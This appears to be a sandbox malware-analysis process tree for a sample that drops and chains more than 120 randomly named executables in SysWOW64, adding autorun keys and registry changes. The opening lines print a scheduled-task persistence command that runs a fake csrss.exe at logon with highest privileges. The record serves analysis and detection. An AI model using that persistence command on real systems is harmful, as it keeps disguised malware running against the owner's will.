Level 4: C:\Windows\SYSTEM32\schtasks.exe (cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F), PID 5660
Level 4: C:\Windows\SYSTEM32\schtasks.exe (cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F), PID 7536
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 11128
  - Loads dropped DLL
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 7720
  - Loads dropped DLL
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
Level 1: C:\Users\Admin\Desktop\virussign.com_0d1d052a017c095816dffa6e1789be93.exe (cmd: "C:\Users\Admin\Desktop\virussign.com_0d1d052a017c095816dffa6e1789be93.exe"), PID 4568
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies registry class
Level 2: C:\Windows\SysWOW64\Bobihl32.exe (cmd: C:\Windows\system32\Bobihl32.exe), PID 580
  - Executes dropped EXE
Level 3: C:\Windows\SysWOW64\Bjgnfd32.exe (cmd: C:\Windows\system32\Bjgnfd32.exe), PID 4608
  - Executes dropped EXE
Level 4: C:\Windows\SysWOW64\Bfnnkeio.exe (cmd: C:\Windows\system32\Bfnnkeio.exe), PID 1524
  - Executes dropped EXE
  - Drops file in System32 directory
Level 5: C:\Windows\SysWOW64\Cmjcmooi.exe (cmd: C:\Windows\system32\Cmjcmooi.exe), PID 4104
  - Executes dropped EXE
  - Drops file in System32 directory
Level 6: C:\Windows\SysWOW64\Ccdkji32.exe (cmd: C:\Windows\system32\Ccdkji32.exe), PID 2912
  - Executes dropped EXE
Level 7: C:\Windows\SysWOW64\Cjqqlc32.exe (cmd: C:\Windows\system32\Cjqqlc32.exe), PID 4472
  - Executes dropped EXE
  - Drops file in System32 directory
Level 8: C:\Windows\SysWOW64\Cpnidj32.exe (cmd: C:\Windows\system32\Cpnidj32.exe), PID 2276
  - Executes dropped EXE
Level 9: C:\Windows\SysWOW64\Cfgaadad.exe (cmd: C:\Windows\system32\Cfgaadad.exe), PID 1040
  - Executes dropped EXE
  - Modifies registry class
Level 10: C:\Windows\SysWOW64\Dmkldm32.exe (cmd: C:\Windows\system32\Dmkldm32.exe), PID 3540
  - Executes dropped EXE
  - Modifies registry class
Level 11: C:\Windows\SysWOW64\Dhpqafpl.exe (cmd: C:\Windows\system32\Dhpqafpl.exe), PID 2184
  - Executes dropped EXE
Level 12: C:\Windows\SysWOW64\Diamin32.exe (cmd: C:\Windows\system32\Diamin32.exe), PID 5092
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Executes dropped EXE
  - Drops file in System32 directory
Level 13: C:\Windows\SysWOW64\Ejfcnp32.exe (cmd: C:\Windows\system32\Ejfcnp32.exe), PID 2644
  - Executes dropped EXE
Level 14: C:\Windows\SysWOW64\Eapkkjqd.exe (cmd: C:\Windows\system32\Eapkkjqd.exe), PID 1608
  - Executes dropped EXE
Level 15: C:\Windows\SysWOW64\Ednggfph.exe (cmd: C:\Windows\system32\Ednggfph.exe), PID 2300
  - Executes dropped EXE
Level 16: C:\Windows\SysWOW64\Eabhpj32.exe (cmd: C:\Windows\system32\Eabhpj32.exe), PID 3416
  - Executes dropped EXE
Level 17: C:\Windows\SysWOW64\Eimldl32.exe (cmd: C:\Windows\system32\Eimldl32.exe), PID 2844
  - Executes dropped EXE
  - Drops file in System32 directory
Level 18: C:\Windows\SysWOW64\Ehnmbddl.exe (cmd: C:\Windows\system32\Ehnmbddl.exe), PID 892
  - Executes dropped EXE
Level 19: C:\Windows\SysWOW64\Ejmioo32.exe (cmd: C:\Windows\system32\Ejmioo32.exe), PID 412
  - Executes dropped EXE
Level 20: C:\Windows\SysWOW64\Epjagf32.exe (cmd: C:\Windows\system32\Epjagf32.exe), PID 1520
  - Executes dropped EXE
Level 21: C:\Windows\SysWOW64\Ffcjcpid.exe (cmd: C:\Windows\system32\Ffcjcpid.exe), PID 4476
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Executes dropped EXE
  - Modifies registry class
Level 22: C:\Windows\SysWOW64\Fibfplhg.exe (cmd: C:\Windows\system32\Fibfplhg.exe), PID 4672
  - Executes dropped EXE
Level 23: C:\Windows\SysWOW64\Fainaihj.exe (cmd: C:\Windows\system32\Fainaihj.exe), PID 2040
  - Executes dropped EXE
Level 24: C:\Windows\SysWOW64\Fkabjo32.exe (cmd: C:\Windows\system32\Fkabjo32.exe), PID 1720
  - Executes dropped EXE
Level 25: C:\Windows\SysWOW64\Fpnkbema.exe (cmd: C:\Windows\system32\Fpnkbema.exe), PID 5016
  - Executes dropped EXE
Level 26: C:\Windows\SysWOW64\Fpqggeko.exe (cmd: C:\Windows\system32\Fpqggeko.exe), PID 4428
  - Executes dropped EXE
Level 27: C:\Windows\SysWOW64\Fpcdme32.exe (cmd: C:\Windows\system32\Fpcdme32.exe), PID 736
  - Executes dropped EXE
Level 28: C:\Windows\SysWOW64\Fhjlnb32.exe (cmd: C:\Windows\system32\Fhjlnb32.exe), PID 4440
  - Executes dropped EXE
Level 29: C:\Windows\SysWOW64\Fkhhjn32.exe (cmd: C:\Windows\system32\Fkhhjn32.exe), PID 4164
  - Executes dropped EXE
Level 30: C:\Windows\SysWOW64\Fabqghpo.exe (cmd: C:\Windows\system32\Fabqghpo.exe), PID 1416
  - Executes dropped EXE
Level 31: C:\Windows\SysWOW64\Ghmidb32.exe (cmd: C:\Windows\system32\Ghmidb32.exe), PID 4304
  - Executes dropped EXE
Level 32: C:\Windows\SysWOW64\Ginekjnj.exe (cmd: C:\Windows\system32\Ginekjnj.exe), PID 4780
  - Executes dropped EXE
Level 33: C:\Windows\SysWOW64\Gaemmgnl.exe (cmd: C:\Windows\system32\Gaemmgnl.exe), PID 4644
  - Executes dropped EXE
  - Modifies registry class
Level 34: C:\Windows\SysWOW64\Ghoeiaei.exe (cmd: C:\Windows\system32\Ghoeiaei.exe), PID 2556
  - Executes dropped EXE
Level 35: C:\Windows\SysWOW64\Gipbaj32.exe (cmd: C:\Windows\system32\Gipbaj32.exe), PID 380
  - Executes dropped EXE
Level 36: C:\Windows\SysWOW64\Gpjjndcd.exe (cmd: C:\Windows\system32\Gpjjndcd.exe), PID 1780
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies registry class
Level 37: C:\Windows\SysWOW64\Gnnkghbn.exe (cmd: C:\Windows\system32\Gnnkghbn.exe), PID 532
  - Executes dropped EXE
Level 38: C:\Windows\SysWOW64\Gplgccaa.exe (cmd: C:\Windows\system32\Gplgccaa.exe), PID 1464
  - Executes dropped EXE
Level 39: C:\Windows\SysWOW64\Ghcoda32.exe (cmd: C:\Windows\system32\Ghcoda32.exe), PID 2056
  - Executes dropped EXE
Level 40: C:\Windows\SysWOW64\Galcmfhd.exe (cmd: C:\Windows\system32\Galcmfhd.exe), PID 1800
  - Executes dropped EXE
Level 41: C:\Windows\SysWOW64\Ghfljq32.exe (cmd: C:\Windows\system32\Ghfljq32.exe), PID 748
  - Executes dropped EXE
Level 42: C:\Windows\SysWOW64\Gkdhfl32.exe (cmd: C:\Windows\system32\Gkdhfl32.exe), PID 1308
  - Executes dropped EXE
Level 43: C:\Windows\SysWOW64\Gnbdbg32.exe (cmd: C:\Windows\system32\Gnbdbg32.exe), PID 1612
  - Executes dropped EXE
Level 44: C:\Windows\SysWOW64\Hdmloaee.exe (cmd: C:\Windows\system32\Hdmloaee.exe), PID 3948
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Executes dropped EXE
Level 45: C:\Windows\SysWOW64\Haqmhf32.exe (cmd: C:\Windows\system32\Haqmhf32.exe), PID 2244
  - Executes dropped EXE
Level 46: C:\Windows\SysWOW64\Hjlamh32.exe (cmd: C:\Windows\system32\Hjlamh32.exe), PID 116
  - Executes dropped EXE
Level 47: C:\Windows\SysWOW64\Hpfjibig.exe (cmd: C:\Windows\system32\Hpfjibig.exe), PID 3696
  - Executes dropped EXE
  - Drops file in System32 directory
Level 48: C:\Windows\SysWOW64\Hkkngk32.exe (cmd: C:\Windows\system32\Hkkngk32.exe), PID 3316
  - Executes dropped EXE
  - Drops file in System32 directory
Level 49: C:\Windows\SysWOW64\Hdcbpqom.exe (cmd: C:\Windows\system32\Hdcbpqom.exe), PID 2860
  - Executes dropped EXE
  - Modifies registry class
Level 50: C:\Windows\SysWOW64\Hknklk32.exe (cmd: C:\Windows\system32\Hknklk32.exe), PID 3476
  - Executes dropped EXE
Level 51: C:\Windows\SysWOW64\Hahcieng.exe (cmd: C:\Windows\system32\Hahcieng.exe), PID 2820
  - Executes dropped EXE
  - Modifies registry class
Level 52: C:\Windows\SysWOW64\Hdfoepmk.exe (cmd: C:\Windows\system32\Hdfoepmk.exe), PID 1888
  - Executes dropped EXE
Level 53: C:\Windows\SysWOW64\Hkpgbjdh.exe (cmd: C:\Windows\system32\Hkpgbjdh.exe), PID 3216
  - Executes dropped EXE
Level 54: C:\Windows\SysWOW64\Iajpod32.exe (cmd: C:\Windows\system32\Iajpod32.exe), PID 1528
  - Executes dropped EXE
Level 55: C:\Windows\SysWOW64\Ihdhkoca.exe (cmd: C:\Windows\system32\Ihdhkoca.exe), PID 3392
  - Executes dropped EXE
Level 56: C:\Windows\SysWOW64\Inqqceai.exe (cmd: C:\Windows\system32\Inqqceai.exe), PID 4444
  - Executes dropped EXE
Level 57: C:\Windows\SysWOW64\Igielk32.exe (cmd: C:\Windows\system32\Igielk32.exe), PID 3708
Level 58: C:\Windows\SysWOW64\Incmie32.exe (cmd: C:\Windows\system32\Incmie32.exe), PID 4788
Level 59: C:\Windows\SysWOW64\Idmefogc.exe (cmd: C:\Windows\system32\Idmefogc.exe), PID 3508
Level 60: C:\Windows\SysWOW64\Ijjnnfej.exe (cmd: C:\Windows\system32\Ijjnnfej.exe), PID 4344
Level 61: C:\Windows\SysWOW64\Idobkoep.exe (cmd: C:\Windows\system32\Idobkoep.exe), PID 3684
Level 62: C:\Windows\SysWOW64\Ignngjdd.exe (cmd: C:\Windows\system32\Ignngjdd.exe), PID 388
  - Modifies registry class
Level 63: C:\Windows\SysWOW64\Iqfcppkd.exe (cmd: C:\Windows\system32\Iqfcppkd.exe), PID 5096
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Drops file in System32 directory
  - Modifies registry class
Level 64: C:\Windows\SysWOW64\Ihmkamkf.exe (cmd: C:\Windows\system32\Ihmkamkf.exe), PID 2008
Level 65: C:\Windows\SysWOW64\Jnjcjdin.exe (cmd: C:\Windows\system32\Jnjcjdin.exe), PID 400
  - Modifies registry class
Level 66: C:\Windows\SysWOW64\Jhpggmid.exe (cmd: C:\Windows\system32\Jhpggmid.exe), PID 1656
Level 67: C:\Windows\SysWOW64\Jkndchhh.exe (cmd: C:\Windows\system32\Jkndchhh.exe), PID 3468
Level 68: C:\Windows\SysWOW64\Jbhlpb32.exe (cmd: C:\Windows\system32\Jbhlpb32.exe), PID 2940
Level 69: C:\Windows\SysWOW64\Jhbdmm32.exe (cmd: C:\Windows\system32\Jhbdmm32.exe), PID 4980
  - Modifies registry class
Level 70: C:\Windows\SysWOW64\Jhdabl32.exe (cmd: C:\Windows\system32\Jhdabl32.exe), PID 4564
Level 71: C:\Windows\SysWOW64\Jkbmng32.exe (cmd: C:\Windows\system32\Jkbmng32.exe), PID 2224
  - Drops file in System32 directory
  - Modifies registry class
Level 72: C:\Windows\SysWOW64\Jdkagm32.exe (cmd: C:\Windows\system32\Jdkagm32.exe), PID 3988
  - Drops file in System32 directory
Level 73: C:\Windows\SysWOW64\Jginci32.exe (cmd: C:\Windows\system32\Jginci32.exe), PID 1512
Level 74: C:\Windows\SysWOW64\Jncfpbac.exe (cmd: C:\Windows\system32\Jncfpbac.exe), PID 4180
Level 75: C:\Windows\SysWOW64\Jqbblnqg.exe (cmd: C:\Windows\system32\Jqbblnqg.exe), PID 1148
Level 76: C:\Windows\SysWOW64\Jiijmkai.exe (cmd: C:\Windows\system32\Jiijmkai.exe), PID 2092
  - Adds autorun key to be loaded by Explorer.exe on startup
Level 77: C:\Windows\SysWOW64\Jjjgec32.exe (cmd: C:\Windows\system32\Jjjgec32.exe), PID 4636
Level 78: C:\Windows\SysWOW64\Kbaofa32.exe (cmd: C:\Windows\system32\Kbaofa32.exe), PID 2932
Level 79: C:\Windows\SysWOW64\Kikgck32.exe (cmd: C:\Windows\system32\Kikgck32.exe), PID 4284
Level 80: C:\Windows\SysWOW64\Kkjcof32.exe (cmd: C:\Windows\system32\Kkjcof32.exe), PID 3792
Level 81: C:\Windows\SysWOW64\Kqflgn32.exe (cmd: C:\Windows\system32\Kqflgn32.exe), PID 3068
  - Modifies registry class
Level 82: C:\Windows\SysWOW64\Kindhk32.exe (cmd: C:\Windows\system32\Kindhk32.exe), PID 3268
Level 83: C:\Windows\SysWOW64\Kjoppccb.exe (cmd: C:\Windows\system32\Kjoppccb.exe), PID 1008
Level 84: C:\Windows\SysWOW64\Kipqnj32.exe (cmd: C:\Windows\system32\Kipqnj32.exe), PID 4960
Level 85: C:\Windows\SysWOW64\Kknmjfje.exe (cmd: C:\Windows\system32\Kknmjfje.exe), PID 2764
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Modifies registry class
Level 86: C:\Windows\SysWOW64\Kegack32.exe (cmd: C:\Windows\system32\Kegack32.exe), PID 1204
Level 87: C:\Windows\SysWOW64\Kjcjkb32.exe (cmd: C:\Windows\system32\Kjcjkb32.exe), PID 1620
Level 88: C:\Windows\SysWOW64\Ljffqbmj.exe (cmd: C:\Windows\system32\Ljffqbmj.exe), PID 4924
  - Adds autorun key to be loaded by Explorer.exe on startup
Level 89: C:\Windows\SysWOW64\Lekknkmp.exe (cmd: C:\Windows\system32\Lekknkmp.exe), PID 4212
Level 90: C:\Windows\SysWOW64\Ljhcfakg.exe (cmd: C:\Windows\system32\Ljhcfakg.exe), PID 5136
Level 91: C:\Windows\SysWOW64\Lbpkgokj.exe (cmd: C:\Windows\system32\Lbpkgokj.exe), PID 5176
Level 92: C:\Windows\SysWOW64\Liicdi32.exe (cmd: C:\Windows\system32\Liicdi32.exe), PID 5224
Level 93: C:\Windows\SysWOW64\Lnfllpan.exe (cmd: C:\Windows\system32\Lnfllpan.exe), PID 5264
Level 94: C:\Windows\SysWOW64\Lgopee32.exe (cmd: C:\Windows\system32\Lgopee32.exe), PID 5312
  - Drops file in System32 directory
  - Modifies registry class
Level 95: C:\Windows\SysWOW64\Ljmmaa32.exe (cmd: C:\Windows\system32\Ljmmaa32.exe), PID 5348
Level 96: C:\Windows\SysWOW64\Lbddbn32.exe (cmd: C:\Windows\system32\Lbddbn32.exe), PID 5388
Level 97: C:\Windows\SysWOW64\Linmohoa.exe (cmd: C:\Windows\system32\Linmohoa.exe), PID 5436
Level 98: C:\Windows\SysWOW64\Lllikdne.exe (cmd: C:\Windows\system32\Lllikdne.exe), PID 5480
Level 99: C:\Windows\SysWOW64\Lnkegomi.exe (cmd: C:\Windows\system32\Lnkegomi.exe), PID 5528
Level 100: C:\Windows\SysWOW64\Laiack32.exe (cmd: C:\Windows\system32\Laiack32.exe), PID 5568
Level 101: C:\Windows\SysWOW64\Liqieh32.exe (cmd: C:\Windows\system32\Liqieh32.exe), PID 5612
  - Adds autorun key to be loaded by Explorer.exe on startup
Level 102: C:\Windows\SysWOW64\Mjaflpbm.exe (cmd: C:\Windows\system32\Mjaflpbm.exe), PID 5656
Level 103: C:\Windows\SysWOW64\Malnij32.exe (cmd: C:\Windows\system32\Malnij32.exe), PID 5700
Level 104: C:\Windows\SysWOW64\Mheffdaf.exe (cmd: C:\Windows\system32\Mheffdaf.exe), PID 5740
  - Adds autorun key to be loaded by Explorer.exe on startup
Level 105: C:\Windows\SysWOW64\Mnpobo32.exe (cmd: C:\Windows\system32\Mnpobo32.exe), PID 5784
Level 106: C:\Windows\SysWOW64\Mankojhg.exe (cmd: C:\Windows\system32\Mankojhg.exe), PID 5828
Level 107: C:\Windows\SysWOW64\Miecpgii.exe (cmd: C:\Windows\system32\Miecpgii.exe), PID 5868
  - Modifies registry class
Level 108: C:\Windows\SysWOW64\Mjfogp32.exe (cmd: C:\Windows\system32\Mjfogp32.exe), PID 5916
  - Drops file in System32 directory
Level 109: C:\Windows\SysWOW64\Mbngim32.exe (cmd: C:\Windows\system32\Mbngim32.exe), PID 5952
Level 110: C:\Windows\SysWOW64\Migpeggf.exe (cmd: C:\Windows\system32\Migpeggf.exe), PID 6000
Level 111: C:\Windows\SysWOW64\Mlflabfj.exe (cmd: C:\Windows\system32\Mlflabfj.exe), PID 6044
  - Drops file in System32 directory
Level 112: C:\Windows\SysWOW64\Mbpdnm32.exe (cmd: C:\Windows\system32\Mbpdnm32.exe), PID 6084
  - Adds autorun key to be loaded by Explorer.exe on startup
  - Modifies registry class
Level 113: C:\Windows\SysWOW64\Menpjhlk.exe (cmd: C:\Windows\system32\Menpjhlk.exe), PID 6128
  - Modifies registry class
Level 114: C:\Windows\SysWOW64\Mlhhgb32.exe (cmd: C:\Windows\system32\Mlhhgb32.exe), PID 5128
Level 115: C:\Windows\SysWOW64\Mbbadlkd.exe (cmd: C:\Windows\system32\Mbbadlkd.exe), PID 5160
Level 116: C:\Windows\SysWOW64\Miliqf32.exe (cmd: C:\Windows\system32\Miliqf32.exe), PID 5220
  - Drops file in System32 directory
Level 117: C:\Windows\SysWOW64\Nlkemb32.exe (cmd: C:\Windows\system32\Nlkemb32.exe), PID 5288
Level 118: C:\Windows\SysWOW64\Nagnei32.exe (cmd: C:\Windows\system32\Nagnei32.exe), PID 5344
Level 119: C:\Windows\SysWOW64\Niofffqo.exe (cmd: C:\Windows\system32\Niofffqo.exe), PID 5416
Level 120: C:\Windows\SysWOW64\Nlmbbapb.exe (cmd: C:\Windows\system32\Nlmbbapb.exe), PID 5472
Level 121: C:\Windows\SysWOW64\Nbgjol32.exe (cmd: C:\Windows\system32\Nbgjol32.exe), PID 5524
Level 122: C:\Windows\SysWOW64\Neefkg32.exe (cmd: C:\Windows\system32\Neefkg32.exe), PID 5596